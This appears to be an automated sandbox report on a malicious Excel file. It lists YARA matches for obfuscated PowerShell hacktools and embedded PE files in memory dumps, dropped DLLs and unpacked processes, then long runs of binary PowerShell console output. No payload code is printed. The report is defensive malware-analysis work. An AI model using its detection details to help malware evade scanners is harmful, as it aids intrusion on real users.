Source: 00000009.00000002.1774965388.00530000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1672911724.00080000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1677284178.01BB0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1775135148.00620000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1775563713.012C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774443824.00470000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673377572.01260000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000000.1635094604.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.1774225767.002D0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1650835635.00360000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000000.1705388458.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1679114701.04400000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1672890417.00060000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000E.00000002.1736973475.00370000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000003.1713665934.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1673047466.00190000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774008438.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673224653.01080000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1777041758.01AE0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1774035610.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1781520586.04430000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1781679900.04480000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673691174.01640000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774465519.004C0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1674343739.019B0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1776428355.01790000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000D.00000002.1736577833.00330000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1780569437.03F60000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1780905680.03FA0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4370000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1880000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.4430000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.60000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4480000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.45c0000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4430000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.260000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.csc.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4400000.7.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4430000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.csc.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4c0000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4370000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.4430000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.19b0000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 13.2.csc.exe.330000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.470000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1880000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3f60000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.3fa0000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.45c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.260000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3ea0000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4480000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.1ae0000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 13.2.csc.exe.330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.csc.exe.370000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.csc.exe.360000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.1790000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1bb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.1ae0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3ea0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3f60000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.19b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.3fa0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1640000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.1790000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1640000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1bb0000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Classification labelShow sources
Source: classification engineClassification label: mal88.troj.expl.evad.winXLS@25/38@6/3
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\ExcelJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR6A81.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsOLE indicator, Workbook stream: true
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N......3Un,...#........3Un....@.m.L|Tn.......l$(Zn...l..e.L|Tn.............7Unp.....Tn@.m.H.&.......N.....$(Zn..Tn....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......#.....&.....A.Xwt...............a.Xw..0.................7W..................#.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4......./...H.&.....A.Xw4...............a.Xw..0................._W................../.........N.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t......./.....&.....A.Xwt...............a.Xw..0.................zW................../.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........4.......;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7..................W..................;...........$.....Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......;.....&.....A.Xwt...............a.Xw..0..................W..................;.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4.......G...H.&.....A.Xw4...............a.Xw..0..................W..................G.........N.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......G.....&.....A.Xwt...............a.Xw..0..................X..................G.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4.......S...H.&.....A.Xw4...............a.Xw..0.................(X..................S.........N.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......S.....&.....A.Xwt...............a.Xw..0.................CX..................S.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4......._...H.&.....A.Xw4...............a.Xw..0.................kX.................._.........N.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t......._.....&.....A.Xwt...............a.Xw..0..................X.................._.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4.......k...H.&.....A.Xw4...............a.Xw..0..................X..................k.........N.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......k.....&.....A.Xwt...............a.Xw..0..................X..................k.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4.......w...H.&.....A.Xw4...............a.Xw..0..................X..................w.........N.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......w.....&.....A.Xwt...............a.Xw..0..................Y..................w.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..N.....4...........H.&.....A.Xw4...............a.Xw..0.................4Y............................N.f.....Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.............&.....A.Xwt...............a.Xw..0.................OY..........................T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........4........... .&.....A.Xw4...............a.Xw..0.................wY....................................Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.............&.....A.Xwt...............a.Xw..0..................Y..........................T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H......3`k,...#........3`k....@.<.L|_k.......l$(ek...l.$A.L|_k.............7`kp....._k@.<.X.2.......H.....$(ek.._k....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......#.....2.....A.Xwt...............a.Xw..0.....................................#.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4......./...X.2.....A.Xw4...............a.Xw..0...................................../.........H.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t......./.....2.....A.Xwt...............a.Xw..0...................................../.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........4.......;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7.....................................;...........$.....Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......;.....2.....A.Xwt...............a.Xw..0................. ...................;.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4.......G...X.2.....A.Xw4...............a.Xw..0.................H...................G.........H.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......G.....2.....A.Xwt...............a.Xw..0.................c...................G.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4.......S...X.2.....A.Xw4...............a.Xw..0.....................................S.........H.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......S.....2.....A.Xwt...............a.Xw..0.....................................S.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4......._...X.2.....A.Xw4...............a.Xw..0....................................._.........H.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t......._.....2.....A.Xwt...............a.Xw..0....................................._.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4.......k...X.2.....A.Xw4...............a.Xw..0.....................................k.........H.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......k.....2.....A.Xwt...............a.Xw..0.................,...................k.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4.......w...X.2.....A.Xw4...............a.Xw..0.................T...................w.........H.......Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.......w.....2.....A.Xwt...............a.Xw..0.....................................w.......T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..H.....4...........X.2.....A.Xw4...............a.Xw..0...............................................H.f.....Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.............2.....A.Xwt...............a.Xw..0.............................................T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........4........... .2.....A.Xw4...............a.Xw..0.................;.....................................Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........t.............2.....A.Xwt...............a.Xw..0.................V...........................T.........Ww........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V......3`k....#........3`k....@.\.L|_k.......l$(ek...l..V.L|_kd............7`k......_k@.\.X>A.......V.....$(ek.._k....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...#.....A.x...A.Xw................a.Xw..0.....D...............................#.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l.../...X>A.8...A.Xw................a.Xw..0.....D.............................../.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.../.....A.x...A.Xw................a.Xw..0.....D.............................../.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7.....D...............................;.......t...$.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...;.....A.x...A.Xw................a.Xw..0.....D...............................;.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l...G...X>A.8...A.Xw................a.Xw..0.....D...............................G.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...G.....A.x...A.Xw................a.Xw..0.....D...........$...................G.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l...S...X>A.8...A.Xw................a.Xw..0.....D...........L...................S.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...S.....A.x...A.Xw................a.Xw..0.....D...........g...................S.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l..._...X>A.8...A.Xw................a.Xw..0.....D..............................._.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l..._.....A.x...A.Xw................a.Xw..0.....D..............................._.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l...k...X>A.8...A.Xw................a.Xw..0.....D...........s...................k.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...k.....A.x...A.Xw................a.Xw..0.....D...............................k.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l...w...X>A.8...A.Xw................a.Xw..0.....D...............................w.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...w.....A.x...A.Xw................a.Xw..0.....D...............................w.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..V.........l.......X>A.8...A.Xw................a.Xw..0.....D.........................................V.f.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.........A.x...A.Xw................a.Xw..0.....D.................................................Ww........
